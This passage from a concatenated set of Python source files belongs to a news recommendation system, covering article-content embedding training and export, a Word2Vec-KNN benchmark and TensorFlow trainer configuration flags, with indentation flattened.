# print(len(list(acr_label_encoders['article_id'].keys())))
# print(len(list(acr_label_encoders['article_id'].values())))
#
# print(len(list_key_old))
# print(len(list_value_old))
acr_label_encoders['article_id'] = dict(zip(list_key_old, list_value_old))
print(len(acr_label_encoders['article_id'].keys()))
print(len(acr_label_encoders['article_id'].values()))
# append df
print("load : {}".format(len(articles_metadata_df_load)))
print("df new : {}".format(len(articles_metadata_df)))
frames = [articles_metadata_df_load, articles_metadata_df]
articles_metadata_df = pd.concat(frames)
articles_metadata_df = articles_metadata_df.reset_index()
articles_metadata_df = articles_metadata_df.drop(columns='index')
# articles_metadata_df = articles_metadata_df.set_index('article_id')
# append content_art_embeding
print("load matrix : {}".format(len(content_article_embeddings_load)))
print("df new : {}".format(len(content_article_embeddings)))
content_article_embeddings = content_article_embeddings[1:]
content_article_embeddings =np.concatenate((content_article_embeddings_load, content_article_embeddings), axis=0)
output_path = path + "acr_articles_metadata_embeddings.pickle"
tf.logging.info('Exporting ACR Label Encoders, Article metadata and embeddings to {}'.format(output_path))
to_serialize = (acr_label_encoders, articles_metadata_df, content_article_embeddings)
serialize(output_path, to_serialize)
def save_to_mysql_database(mysql_host, mysql_user, mysql_passwd, mysql_database, acr_label_encoders,
articles_metadata_df, content_article_embeddings):
'''
-
- database and table have already create
'''
mydb = mysql.connector.connect(
host=mysql_host,
user=mysql_user,
passwd=<PASSWORD>,
database=mysql_database
)
mycursor = mydb.cursor()
sql = "INSERT INTO customers (news_id, news_id_encode, word_embedding) VALUES (%s, %s, %s)"
tupel = ()
# for i in range(0, len(acr_label_encoders[0]['article_id'])):
# tupel = tupel + (list(acr_label_encoders[0]['article_id'].keys())[i], list(acr_label_encoders[0]['article_id'].values())[i], list(aa[2][i]))
mycursor.execute(sql, tupel)
mydb.commit()
from datetime import datetime
# GET CURRENT TIME
def get_date_time_current():
now = datetime.now()
timestamp = int(datetime.timestamp(now))
return str(timestamp)
# SUBTRACT TIME
def subtract_month(current_time):
from datetime import datetime
dt_object = datetime.fromtimestamp(int(current_time))
a = dt_object.strftime('%Y-%m-%d')
import datetime
import dateutil.relativedelta
d = datetime.datetime.strptime(a, "%Y-%m-%d")
d2 = d - dateutil.relativedelta.relativedelta(days=7)
# print(d2)
from datetime import datetime
timestamp = datetime.timestamp(d2)
return int(timestamp)
# REMOVE PICKLE
parameter = load_json_config("./parameter.json")
def remove_acr_pickle(path_file):
acr_label_encoders, articles_metadata_df, content_article_embeddings_matrix = deserialize(path_file)
def serialize(filename, obj):
# with open(filename, 'wb') as handle:
with tf.gfile.Open(filename, 'wb') as handle:
pickle.dump(obj, handle)
def merge_two_dicts(x, y):
return {**x, **y}
# articles_metadata_df = articles_metadata_df[
# articles_metadata_df['created_at_ts'] >= subtract_month(get_date_time_current())]
lena = 600
# acr_label_encoders
a = acr_label_encoders["article_id"]
a = merge_two_dicts({"<PAD>": 0}, dict(list(a.items())[-lena:]))
acr_label_encoders["article_id"] = a
list_key = list(acr_label_encoders["article_id"].keys())
list_value = list(range(len(list_key)))
acr_label_encoders["article_id"] = dict(zip(list_key, list_value))
# df
list_value = list_value[1:]
articles_metadata_df = articles_metadata_df[-lena:]
articles_metadata_df['article_id'] = list_value
# matrix
matrix = np.insert(content_article_embeddings_matrix[-lena:], 0, content_article_embeddings_matrix[0], axis=0)
to_serialize = (acr_label_encoders, articles_metadata_df, matrix)
# creat folder acr predict
dir = "/pickles/acr_articles_metadata_embeddings_predict/"
DATA_DIR = parameter["DATA_DIR"]
path_predict = DATA_DIR + dir
from os import path
if path.exists(path_predict):
pass
else:
os.makedirs(path_predict)
serialize(path_predict+"acr_articles_metadata_embeddings_predict.pickle", to_serialize)
def main_acr_train():
# def main(unused_argv):
# try:
print("<=== STARTING ARC TRAINING ===>")
parameter = load_json_config("./parameter.json")
list_args = parameter["acr_training"]
DATA_DIR = parameter["DATA_DIR"]
model_dir = DATA_DIR + list_args["model_dir"]
train_set_path_regex = DATA_DIR + list_args["train_set_path_regex"]
input_word_vocab_embeddings_path = DATA_DIR + list_args["input_word_vocab_embeddings_path"]
input_label_encoders_path = DATA_DIR + list_args["input_label_encoders_path"]
output_acr_metadata_embeddings_path = DATA_DIR + list_args["output_acr_metadata_embeddings_path"]
batch_size = list_args["batch_size"]
truncate_tokens_length = list_args["truncate_tokens_length"]
training_epochs = list_args["training_epochs"]
learning_rate = list_args["learning_rate"]
dropout_keep_prob = list_args["dropout_keep_prob"]
l2_reg_lambda = list_args["l2_reg_lambda"]
text_feature_extractor = list_args["text_feature_extractor"]
training_task = list_args["training_task"]
cnn_filter_sizes = list_args["cnn_filter_sizes"]
cnn_num_filters = list_args["cnn_num_filters"]
rnn_units = list_args["rnn_units"]
rnn_layers = list_args["rnn_layers"]
rnn_direction = list_args["rnn_direction"]
acr_embeddings_size = list_args["acr_embeddings_size"]
# mysql_host = list_args["mysql_host"]
# mysql_user = list_args["mysql_user"]
# mysql_passwd = list_args["mysql_passwd"]
# mysql_database = list_args["mysql_database"]
# Capture whether it will be a single training job or a hyper parameter tuning job.
tf_config_env = json.loads(os.environ.get('TF_CONFIG', '{}'))
task_data = tf_config_env.get('task') or {'type': 'master', 'index': 0}
trial = task_data.get('trial')
running_on_mlengine = (len(tf_config_env) > 0)
tf.logging.info('Running {}'.format('on Google ML Engine' if running_on_mlengine else 'on a server/machine'))
#Disabling duplicate logs on console when running locally
logging.getLogger('tensorflow').propagate = running_on_mlengine
start_train = time()
tf.logging.info('Starting training job')
model_output_dir = model_dir
if trial is not None:
model_output_dir = os.path.join(model_output_dir, trial)
tf.logging.info(
"Hyperparameter Tuning - Trial {}. model_dir = {}".format(trial, model_output_dir))
else:
tf.logging.info('Saving model outputs to {}'.format(model_output_dir))
tf.logging.info('Loading ACR preprocessing assets')
# check exist path
if path.exists(model_output_dir):
pass
else:
os.makedirs(model_output_dir)
if path.exists(output_acr_metadata_embeddings_path):
pass
else:
os.makedirs(output_acr_metadata_embeddings_path)
print("Loading ACR preprocessing assets....")
print(input_label_encoders_path)
print(output_acr_metadata_embeddings_path)
file_lable_encode = get_all_file(input_label_encoders_path)[0]
file_word_embedding = get_all_file(input_word_vocab_embeddings_path)[0]
# current_time = split_date(file_lable_encode)
# print(current_time)
# load file with max date
acr_label_encoders, labels_class_weights, word_embeddings_matrix = \
load_acr_preprocessing_assets(file_lable_encode,file_word_embedding)
features_config = get_session_features_config(acr_label_encoders)
#input_tfrecords = os.path.join(FLAGS.data_dir, FLAGS.train_set_path_regex)
input_tfrecords = train_set_path_regex
tf.logging.info('Defining input data (TFRecords): {}'.format(input_tfrecords))
#Creating an ambedding for a special token to initiate decoding of RNN-autoencoder
special_token_embedding_vector = np.random.uniform(low=-0.04, high=0.04,
size=[1,word_embeddings_matrix.shape[1]])
# train_files = get_listmax_date(get_all_file(train_set_path_regex))
train_files = get_all_file(train_set_path_regex)
print(train_files)
if len(os.listdir(model_dir)) == 0: #acr_model not exist
print("NO Have ACR Module")
acr_model = build_acr_estimator(model_output_dir,
word_embeddings_matrix,
features_config,
labels_class_weights,
special_token_embedding_vector, list_args)
tf.logging.info('Training model')
acr_model.train(input_fn=lambda: prepare_dataset(files=train_files,
features_config=features_config,
batch_size=batch_size,
epochs=training_epochs,
shuffle_dataset=True,
shuffle_buffer_size=10000))
else: #acr_model exist
print("Have ACR Module")
acr_model = build_acr_estimator(model_output_dir,
word_embeddings_matrix,
features_config,
labels_class_weights,
special_token_embedding_vector, list_args)
#The objective is to overfitting this network, so that the ACR embedding represent well the articles content
tf.logging.info('Evaluating model - TRAIN SET')
print("Evaluating model - TRAIN SET")
eval_results = acr_model.evaluate(input_fn=lambda: prepare_dataset(files=train_files,
features_config=features_config,
batch_size=batch_size,
epochs=1,
shuffle_dataset=False))
tf.logging.info('Evaluation results with TRAIN SET (objective is to overfit): {}'.format(eval_results))
'''
tf.logging.info('Evaluating model - TEST SET')
eval_results = acr_model.evaluate(input_fn=lambda: prepare_dataset(files=test_files,
features_config=features_config,
batch_size=FLAGS.batch_size,
epochs=1,
shuffle_dataset=False))
tf.logging.info('Evaluation results with TEST SET: {}'.format(eval_results))
'''
tf.logging.info('Predicting ACR embeddings')
print("Predicting ACR embeddings")
article_metadata_with_pred_embeddings = acr_model.predict(input_fn=lambda: prepare_dataset(files=train_files,
features_config=features_config,
batch_size=batch_size,
epochs=1,
shuffle_dataset=False))
articles_metadata_df, content_article_embeddings = get_articles_metadata_embeddings(article_metadata_with_pred_embeddings)
tf.logging.info('Generated ACR embeddings: {}'.format(content_article_embeddings.shape))
# read csv preprocessed by acr preprocessing
list_args2 = parameter["acr_preprocess"]
path_csv = DATA_DIR + list_args2['output_articles_csv_path_preprocessed']
df = pd.read_csv(get_all_file(path_csv)[0])
print(len(df['id']))
export_acr_metadata_embeddings_with_datetime(df, acr_label_encoders, articles_metadata_df, content_article_embeddings, output_acr_metadata_embeddings_path)
print("Export done, Call load acr auto ...")
print("Remove acr embedding")
remove_acr_pickle(get_all_file(output_acr_metadata_embeddings_path)[0])
# TODO gọi service load acr_label_encoders, articles_metadata_df, content_article_embeddings vào biến singleton
# import requests
# resp = requests.get('http://0.0.0.0:8082/loadacr')
# if resp.status_code == 200:
# print("Called load acr_pickle")
# else:
# print("Not Yet call load acr_pickle")
# save_to_mysql_database( mysql_host, mysql_user, mysql_passwd, mysql_database, acr_label_encoders,articles_metadata_df , content_article_embeddings)
# after trainning, delete all file tfrecord
delete_all_file_in_path(train_set_path_regex)
log_elapsed_time(start_train, 'Finalized TRAINING')
print("<=== END ARC TRAINING ===>")
# except Exception as ex:
# tf.logging.error('ERROR: {}'.format(ex))
# raise
if __name__ == '__main__':
tf.app.run()
```
#### File: nar/benchmarks/w2v_knn.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import multiprocessing
import os
import numpy as np
from gensim.models import Word2Vec
from gensim.models.callbacks import CallbackAny2Vec
from tqdm import tqdm
from .benchmarks import BenchmarkRecommender
from ..utils import max_n_sparse_indexes
import pandas as pd
class EpochLogger(CallbackAny2Vec):
'''Callback to log information about training'''
def __init__(self, total_epoch):
self.epoch = 0
self.bar = tqdm(total=total_epoch)
def on_epoch_begin(self, model):
pass
def on_epoch_end(self, model):
self.epoch += 1
self.bar.update(1)
class Word2VecKNN(BenchmarkRecommender):
def __init__(self, clicked_items_state, params, eval_streaming_metrics):
super().__init__(clicked_items_state, params, eval_streaming_metrics)
total_epoch = params["total_epoch"]
window = params["window"]
embedded_size = params["embedded_size"]
self.iter = 0
self.epoch = total_epoch
self.model = Word2Vec(size=embedded_size, window=window, min_count=1,
workers=int(multiprocessing.cpu_count() * 0.8),
sg=1, iter=total_epoch, callbacks=(), compute_loss=True)
def get_clf_suffix(self):
return 'w2v_knn'
def get_description(self):
return 'Word2Vec-KNN: Most similar items sessions based on normalized cosine similarity between session ' \
'co-occurrence learned using Word2Vec'
def get_all_sessions_clicks(self, sessions_items, sessions_next_items):
sessions_all_items_but_last = list([list(filter(lambda x: x != 0, session)) for session in sessions_items])
sessions_last_item_clicked = list(
[list(filter(lambda x: x != 0, session))[-1] for session in sessions_next_items])
sessions_all_clicks = [previous_items + [last_item] \
for previous_items, last_item in
zip(sessions_all_items_but_last, sessions_last_item_clicked)]
return sessions_all_clicks
def get_sentences(self, sessions_ids, sessions_items, sessions_next_items):
all_session_click = self.get_all_sessions_clicks(sessions_items, sessions_next_items)
all_session_click = [list(map(str, session)) for session in all_session_click]
return all_session_click
def build_sentences(self, recent_click):
df = pd.DataFrame({"item": recent_click[:,0], "session": recent_click[:,1]})
df = df.groupby(["session"])["item"].apply(list)
return df.tolist()
def train(self, users_ids, sessions_ids, sessions_items, sessions_next_items):
self.train_model(self.get_sentences(sessions_ids, sessions_items, sessions_next_items))
def train_model(self, sentences):
update = False if self.iter == 0 else True
self.model.build_vocab(sentences=sentences, update=update)
self.model.train(sentences=sentences, total_examples=len(sentences), epochs=self.epoch)
self.iter += 1
# print("knn iter=", self.iter)
# print(self.model.wv.vectors.shape[0])
def predict(self, users_ids, sessions_items, topk=5, valid_items=None):
print("Predicting")
session_predictions = np.zeros(dtype=np.int64,
shape=[sessions_items.shape[0],
sessions_items.shape[1],
topk])
for row_idx, session_items in enumerate(sessions_items):
s_item = []
for col_idx, item in enumerate(session_items):
if item != 0:
item = str(item)
if item in self.model.wv:
s_item.append(item)
if len(s_item) == 0:
preds = []
else:
# Sorts items its score
similar_list = self.model.wv.most_similar(positive=s_item, topn=self.model.wv.vectors.shape[0])
preds = [int(item) for item, score in similar_list]
# print(preds)
session_predictions[row_idx, col_idx] = list(
self._get_top_n_valid_items(preds, topk, valid_items[row_idx, col_idx]))
return session_predictions
```
#### File: nar_module/nar/eval_hook.py
```python
import time
import tensorflow as tf
import numpy as np
class EvalHook(tf.train.SessionRunHook):
def __init__(self):
super().__init__()
self.begin_ts = None
self.all_pred_time = None
def begin(self):
self.all_pred_time = []
def before_run(self, run_context):
self.begin_ts = time.time()
def after_run(self, run_context, run_values):
run_time = time.time() - self.begin_ts
self.all_pred_time.append(run_time)
def end(self, session):
all_pred_time = np.array(self.all_pred_time, dtype=np.float)
print("Min, max, avg %f - %f - %f" % (np.min(all_pred_time), np.max(all_pred_time), np.average(all_pred_time)))
print("Total %d, took %d " % (len(all_pred_time), np.sum(all_pred_time)))
self.all_pred_time = None
```
#### File: nar_module/nar/nar_trainer_cafebiz_full.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
#Disabling GPU for local execution
#import os
#os.environ["CUDA_VISIBLE_DEVICES"]="-1"
from time import time
import tensorflow as tf
import json
import os
import numpy as np
import tempfile
import logging
import shutil
from acr_module.acr.acr_module_service import load_json_config
from pick_singleton.pick_singleton import ACR_Pickle_Singleton, NAR_Pickle_Singleton
from redis_connector.RedisClient import Singleton
from .utils import resolve_files, chunks, log_elapsed_time, append_lines_to_text_file, min_max_scale, get_current_time
from .datasets import prepare_dataset_iterator, prepare_dataset_generator_predict, parse_sequence_example_predict
from .nar_model import ClickedItemsState, ItemsStateUpdaterHook, NARModuleModel,get_list_id, get_tf_dtype
from .benchmarks import RecentlyPopularRecommender, ContentBasedRecommender, ItemCooccurrenceRecommender, ItemKNNRecommender, SessionBasedKNNRecommender, SequentialRulesRecommender
from .nar_utils import load_acr_module_resources, load_nar_module_preprocessing_resources, save_eval_benchmark_metrics_csv, \
upload_model_output_to_gcs, dowload_model_output_from_gcs
import glob
tf.logging.set_verbosity(tf.logging.INFO)
#Making results reproduceable
RANDOM_SEED=42
np.random.seed(RANDOM_SEED)
#Model params
tf.flags.DEFINE_integer('batch_size', default=64, help='Batch size')
tf.flags.DEFINE_integer('truncate_session_length', default=20, help='Truncate long sessions to this max. size')
tf.flags.DEFINE_float('learning_rate', default=1e-3, help='Lerning Rate')
tf.flags.DEFINE_float('dropout_keep_prob', default=1.0, help='Dropout (keep prob.)')
tf.flags.DEFINE_float('reg_l2', default=0.0001, help='L2 regularization')
tf.flags.DEFINE_float('softmax_temperature', default=0.2, help='Initial value for temperature for softmax')
tf.flags.DEFINE_float('recent_clicks_buffer_hours', default=1.0, help='Number of hours that will be kept in the recent clicks buffer (limited by recent_clicks_buffer_max_size)')
tf.flags.DEFINE_integer('recent_clicks_buffer_max_size', default=6000, help='Maximum size of recent clicks buffer')
tf.flags.DEFINE_integer('recent_clicks_for_normalization', default=2500, help='Number of recent clicks to normalize recency and populary novelty) dynamic features')
tf.flags.DEFINE_integer('eval_metrics_top_n', default=100, help='Eval. metrics Top N')
tf.flags.DEFINE_integer('CAR_embedding_size', default=1024, help='CAR submodule embedding size')
tf.flags.DEFINE_integer('rnn_units', default=10, help='Number of units of RNN cell')
tf.flags.DEFINE_integer('rnn_num_layers', default=1, help='Number of of RNN layers')
tf.flags.DEFINE_integer('train_total_negative_samples', default=7, help='Total negative samples for training')
tf.flags.DEFINE_integer('train_negative_samples_from_buffer', default=10, help='Training Negative samples from recent clicks buffer')
tf.flags.DEFINE_integer('eval_total_negative_samples', default=600, help='Total negative samples for evaluation')
tf.flags.DEFINE_integer('eval_negative_samples_from_buffer', default=5000, help='Eval. Negative samples from recent clicks buffer')
tf.flags.DEFINE_bool('save_histograms', default=False, help='Save histograms to view on Tensorboard (make job slower)')
tf.flags.DEFINE_bool('disable_eval_benchmarks', default=True, help='Disable eval benchmarks')
tf.flags.DEFINE_bool('eval_metrics_by_session_position', default=False, help='Computes eval metrics at each position within session (e.g. 1st click, 2nd click)')
tf.flags.DEFINE_float('novelty_reg_factor', default=0.0, help='Popularity Regularization Loss (e.g. 0.1, 0.2, 0.3)')
tf.flags.DEFINE_float('diversity_reg_factor', default=0.0, help='Diversity (similarity) Regularization Loss (e.g. 0.1, 0.2, 0.3)')
tf.flags.DEFINE_float('eval_negative_sample_relevance', default=0.1, help='Relevance of negative samples within top-n recommended items for evaluation (relevance of positive sample is always 1.0)')
tf.flags.DEFINE_string('current_time', default=get_current_time(), help='get current running time for save top-n recommendation')
tf.flags.DEFINE_bool('save_eval_per_sessions', default=False, help='Save last batch evaluation for each session hours trainning')
tf.flags.DEFINE_list('enabled_clicks_input_features_groups',
default='time,location', help='Groups of input contextual features for user clicks, separated by comma. Valid values: ALL,NONE,time,device,location,referrer')
tf.flags.DEFINE_list('enabled_articles_input_features_groups',
default='category', help='Groups of input metadata features for articles, separated by comma. Valid values: ALL,NONE,category,author')
tf.flags.DEFINE_list('enabled_internal_features',
default='recency,novelty,article_content_embeddings', help='Internal features. Valid values: ALL,NONE,recency,novelty,article_content_embeddings,item_clicked_embeddings')
#Control params
#tf.flags.DEFINE_string('data_dir', default_value='./tmp',
# help='Directory where the dataset is located')
tf.flags.DEFINE_string('train_set_path_regex',
default='/train*.tfrecord', help='Train set regex')
tf.flags.DEFINE_string('acr_module_resources_path',
default='/pickles', help='ACR module resources path')
tf.flags.DEFINE_string('nar_module_preprocessing_resources_path',
default='/pickles', help='NAR module preprocessing resources path')
tf.flags.DEFINE_string('model_dir', default='./tmp',
help='Directory where save model checkpoints')
tf.flags.DEFINE_string('warmup_model_dir', default=None,
help='Directory where model checkpoints of a previous job where output, to warm start this network training')
tf.flags.DEFINE_integer('train_files_from', default=0, help='Train model starting from file N')
tf.flags.DEFINE_integer('train_files_up_to', default=100, help='Train model up to file N')
tf.flags.DEFINE_integer('training_hours_for_each_eval', default=5, help='Train model for N hours before evaluation of the next hour')
tf.flags.DEFINE_integer('save_results_each_n_evals', default=5, help='Saves to disk and uploads to GCS (ML Engine) the incremental evaluation results each N evaluations')
tf.flags.DEFINE_bool('save_eval_sessions_negative_samples', default=False, help='Save negative samples of each session during evaluation')
tf.flags.DEFINE_bool('save_eval_sessions_recommendations', default=False, help='Save CHAMELEON recommendations log during evaluation')
tf.flags.DEFINE_bool('use_local_cache_model_dir', default=False, help='Persists checkpoints and events in a local temp file, copying to GCS in the end of the process (useful for ML Engine jobs, because saving and loading checkpoints slows training job)')
#Default param used by ML Engine to validate whether the path exists
tf.flags.DEFINE_string('job-dir', default='./tmp', help='Job dir to save staging files')
tf.flags.DEFINE_bool('prediction_only', default=False, help='Experimental prediction only mode')
FLAGS = tf.flags.FLAGS
#params_dict = tf.app.flags.FLAGS.flag_values_dict()
#tf.logging.info('PARAMS: {}'.format(json.dumps(params_dict)))
ALL_FEATURES = 'ALL'
def get_articles_features_config(acr_label_encoders):
articles_features_config = {
#Required fields
'article_id': {'type': 'categorical', 'dtype': 'int'},
'created_at_ts': {'type': 'numerical', 'dtype': 'int'},
#Additional metadata fields
'category0': {'type': 'categorical', 'dtype': 'int'}, #'cardinality': 41},
# 'category1': {'type': 'categorical', 'dtype': 'int'}, #'cardinality': 128},
# 'author': {'type': 'categorical', 'dtype': 'int'}, #'cardinality': 112},
}
feature_groups = {
'category': ['category0'],
# 'category': ['category0', 'category1'],
# 'author': ['author'],
}
#Disabling optional features when required
if FLAGS.enabled_articles_input_features_groups != [ALL_FEATURES]:
for feature_group in feature_groups:
if feature_group not in FLAGS.enabled_articles_input_features_groups:
for feature in feature_groups[feature_group]:
del articles_features_config[feature]
#Adding cardinality to categorical features
for feature_name in articles_features_config:
if feature_name in acr_label_encoders and articles_features_config[feature_name]['type'] == 'categorical':
articles_features_config[feature_name]['cardinality'] = len(acr_label_encoders[feature_name])
# tf.logging.info('Article Features: {}'.format(articles_features_config))
return articles_features_config
def process_articles_metadata(articles_metadata_df, articles_features_config):
articles_metadata = {}
for feature_name in articles_features_config:
articles_metadata[feature_name] = articles_metadata_df[feature_name].values
#Appending a row in the first position to correspond to the <PAD> article #
# (so that it correspond to content_article_embeddings_matrix.shape[0])
articles_metadata[feature_name] = np.hstack([[0], articles_metadata[feature_name]])
return articles_metadata
def get_session_features_config(nar_label_encoders_dict):
session_features_config = {
'single_features': {
#Control features
'user_id': {'type': 'categorical', 'dtype': 'bytes'},
'session_id': {'type': 'numerical', 'dtype': 'int'},
'session_size': {'type': 'numerical', 'dtype': 'int'},
'session_start': {'type': 'numerical', 'dtype': 'int'},
},
'sequence_features': {
#Required sequence features
'event_timestamp': {'type': 'numerical', 'dtype': 'int'},
'item_clicked': {'type': 'categorical', 'dtype': 'int'},#, 'cardinality': 72933},
#Location
'city': {'type': 'categorical', 'dtype': 'int'}, #'cardinality': 1022},
# 'region': {'type': 'categorical', 'dtype': 'int'}, #'cardinality': 237},
# 'country': {'type': 'categorical', 'dtype': 'int'}, #'cardinality': 70},
#Device
# 'device': {'type': 'categorical', 'dtype': 'int'}, #'cardinality': 5},
'os': {'type': 'categorical', 'dtype': 'int'}, #'cardinality': 10},
#Time
'local_hour_sin': {'type': 'numerical', 'dtype': 'float'},
'local_hour_cos': {'type': 'numerical', 'dtype': 'float'},
'weekday': {'type': 'numerical', 'dtype': 'float'},
#Referrer type
# 'referrer_class': {'type': 'categorical', 'dtype': 'int'}, #'cardinality': 7}}}
}
}
feature_groups = {
'time': ['local_hour_sin', 'local_hour_cos', 'weekday'],
'device': ['os'],
'location': ['city'],
'referrer': []
# 'device': ['device', 'os'],
# 'location': ['country', 'region', 'city'],
# 'referrer': ['referrer_class']
}
#Disabling optional features when required
if FLAGS.enabled_clicks_input_features_groups != [ALL_FEATURES]:
for feature_group in feature_groups:
if feature_group not in FLAGS.enabled_clicks_input_features_groups:
for feature in feature_groups[feature_group]:
del session_features_config['sequence_features'][feature]
#Adding cardinality to categorical features
for feature_groups_key in session_features_config:
features_group_config = session_features_config[feature_groups_key]
for feature_name in features_group_config:
if feature_name in nar_label_encoders_dict and features_group_config[feature_name]['type'] == 'categorical':
features_group_config[feature_name]['cardinality'] = len(nar_label_encoders_dict[feature_name])
# tf.logging.info('Session Features: {}'.format(session_features_config))
return session_features_config
def get_internal_enabled_features_config():
VALID_INTERNAL_FEATURES = ['recency','novelty','article_content_embeddings','item_clicked_embeddings']
internal_features_config = {}
enabled_features = []
if FLAGS.enabled_internal_features == [ALL_FEATURES]:
enabled_features = set(VALID_INTERNAL_FEATURES)
else:
enabled_features = set(FLAGS.enabled_internal_features).intersection(set(VALID_INTERNAL_FEATURES))
for feature in VALID_INTERNAL_FEATURES:
internal_features_config[feature] = (feature in enabled_features)
tf.logging.info('Enabled internal features: {}'.format(enabled_features))
return internal_features_config
def nar_module_model_fn(features, labels, mode, params):
if mode == tf.estimator.ModeKeys.TRAIN:
negative_samples = params['train_total_negative_samples']
negative_sample_from_buffer = params['train_negative_samples_from_buffer']
elif mode == tf.estimator.ModeKeys.EVAL:
negative_samples = params['eval_total_negative_samples']
negative_sample_from_buffer = params['eval_negative_samples_from_buffer']
elif mode == tf.estimator.ModeKeys.PREDICT:
negative_samples = params['eval_total_negative_samples']
negative_sample_from_buffer = params['eval_negative_samples_from_buffer']
dropout_keep_prob = params['dropout_keep_prob'] if mode == tf.estimator.ModeKeys.TRAIN else 1.0
internal_features_config = get_internal_enabled_features_config()
eval_metrics_top_n = params['eval_metrics_top_n']
model = NARModuleModel(mode, features, labels,
session_features_config=params['session_features_config'],
articles_features_config=params['articles_features_config'],
batch_size=params['batch_size'],
lr=params['lr'],
keep_prob=dropout_keep_prob,
negative_samples=negative_samples,
negative_sample_from_buffer=negative_sample_from_buffer,
reg_weight_decay=params['reg_weight_decay'],
softmax_temperature=params['softmax_temperature'],
articles_metadata=params['articles_metadata'],
content_article_embeddings_matrix=params['content_article_embeddings_matrix'],
recent_clicks_buffer_hours=params['recent_clicks_buffer_hours'],
recent_clicks_buffer_max_size=params['recent_clicks_buffer_max_size'],
recent_clicks_for_normalization=params['recent_clicks_for_normalization'],
CAR_embedding_size=params['CAR_embedding_size'],
rnn_units=params['rnn_units'],
# metrics_top_n=100,
metrics_top_n=eval_metrics_top_n,
plot_histograms=params['save_histograms'],
novelty_reg_factor=params['novelty_reg_factor'],
diversity_reg_factor=params['diversity_reg_factor'],
internal_features_config=internal_features_config
)
#Using these variables as global so that they persist across different train and eval
global clicked_items_state, eval_sessions_metrics_log, sessions_negative_items_log
eval_benchmark_classifiers = []
if not FLAGS.disable_eval_benchmarks:
eval_benchmark_classifiers=[
#{'recommender': Word2VecKNN, 'params': {"total_epoch": 100, "window": 5, "embedded_size":300}},
{'recommender': RecentlyPopularRecommender, 'params': {}},
{'recommender': ItemCooccurrenceRecommender, 'params': {}},
{'recommender': ItemKNNRecommender,
'params': {'reg_lambda': 20, #Regularization. Discounts the similarity of rare items (incidental co-occurrences).
'alpha': 0.5 #Balance between normalizing with the supports of the two items. 0.5 gives cosine similarity, 1.0 gives confidence (as in association rules).
}},
{'recommender': SessionBasedKNNRecommender,
'params': {'sessions_buffer_size': 3000, #Buffer size of last processed sessions
'candidate_sessions_sample_size': 2000, #200, #Number of candidate near sessions to sample
'sampling_strategy': 'recent', #(recent,random)
'nearest_neighbor_session_for_scoring': 500, #50 #Nearest neighbors to compute item scores
'similarity': 'cosine', #(jaccard, cosine)
'first_session_clicks_decay': 'div' #Decays weight of first user clicks in active session when finding neighbor sessions (same, div, linear, log, quadradic)
}},
{'recommender': ContentBasedRecommender,
'params': {'articles_metadata': params['articles_metadata'],
'content_article_embeddings_matrix': params['content_article_embeddings_matrix']}},
{'recommender': SequentialRulesRecommender,
'params': {'max_clicks_dist': 10, #Max number of clicks to walk back in the session from the currently viewed item. (Default value: 10)
'dist_between_clicks_decay': 'div' #Decay function for distance between two items clicks within a session (linear, same, div, log, qudratic). (Default value: div)
}}
]
hooks = [ItemsStateUpdaterHook(mode, model,
eval_metrics_top_n=eval_metrics_top_n,
clicked_items_state=clicked_items_state,
eval_sessions_metrics_log=eval_sessions_metrics_log,
sessions_negative_items_log=sessions_negative_items_log,
sessions_chameleon_recommendations_log=sessions_chameleon_recommendations_log,
content_article_embeddings_matrix=params['content_article_embeddings_matrix'],
articles_metadata=params['articles_metadata'],
eval_negative_sample_relevance=params['eval_negative_sample_relevance'],
global_eval_hour_id=global_eval_hour_id,
eval_benchmark_classifiers=eval_benchmark_classifiers,
eval_metrics_by_session_position=params['eval_metrics_by_session_position']
)]
if mode == tf.estimator.ModeKeys.TRAIN:
return tf.estimator.EstimatorSpec(mode, loss=model.total_loss, train_op=model.train,
training_chief_hooks=hooks)
elif mode == tf.estimator.ModeKeys.EVAL:
eval_metrics = {#'hitrate_at_1': (model.next_item_accuracy_at_1, model.next_item_accuracy_at_1_update_op),
'hitrate_at_n': (model.recall_at_n, model.recall_at_n_update_op),
'mrr_at_n': (model.mrr, model.mrr_update_op),
#'ndcg_at_n': (model.ndcg_at_n_mean, model.ndcg_at_n_mean_update_op),
}
return tf.estimator.EstimatorSpec(mode, loss=model.total_loss, eval_metric_ops=eval_metrics,
evaluation_hooks=hooks)
elif mode == tf.estimator.ModeKeys.PREDICT:
return tf.estimator.EstimatorSpec(mode,predictions=model.predictions,prediction_hooks=hooks)
def build_estimator(model_dir,
content_article_embeddings_matrix,
articles_metadata, articles_features_config,
session_features_config):
"""Build an estimator appropriate for the given model type."""
#Disabling GPU (memory issues on local machine)
#config_proto = tf.ConfigProto(device_count={'GPU': 0})
run_config = tf.estimator.RunConfig(tf_random_seed=RANDOM_SEED,
keep_checkpoint_max=1,
save_checkpoints_secs=1200,
save_summary_steps=100,
log_step_count_steps=100,
#session_config=config_proto
)
estimator = tf.estimator.Estimator(
config=run_config,
model_dir=model_dir,
model_fn=nar_module_model_fn,
params={
'batch_size': FLAGS.batch_size,
'lr': FLAGS.learning_rate,
'dropout_keep_prob': FLAGS.dropout_keep_prob,
'reg_weight_decay': FLAGS.reg_l2,
'recent_clicks_buffer_hours': FLAGS.recent_clicks_buffer_hours,
'recent_clicks_buffer_max_size': FLAGS.recent_clicks_buffer_max_size,
'recent_clicks_for_normalization': FLAGS.recent_clicks_for_normalization,
'eval_metrics_top_n': FLAGS.eval_metrics_top_n,
'CAR_embedding_size': FLAGS.CAR_embedding_size,
'rnn_units': FLAGS.rnn_units,
'train_total_negative_samples': FLAGS.train_total_negative_samples,
'train_negative_samples_from_buffer': FLAGS.train_negative_samples_from_buffer,
'eval_total_negative_samples': FLAGS.eval_total_negative_samples,
'eval_negative_samples_from_buffer': FLAGS.eval_negative_samples_from_buffer,
'softmax_temperature': FLAGS.softmax_temperature,
'save_histograms': FLAGS.save_histograms,
'eval_metrics_by_session_position': FLAGS.eval_metrics_by_session_position,
'novelty_reg_factor': FLAGS.novelty_reg_factor,
'diversity_reg_factor': FLAGS.diversity_reg_factor,
'eval_negative_sample_relevance': FLAGS.eval_negative_sample_relevance,
#From pre-processing
'session_features_config': session_features_config,
'articles_features_config': articles_features_config,
'articles_metadata': articles_metadata,
#From ACR module
'content_article_embeddings_matrix': content_article_embeddings_matrix
})
return estimator
#Saving the negative samples used to evaluate each sessions, so that benchmarks metrics outside the framework (eg. Matrix Factorization) can be comparable
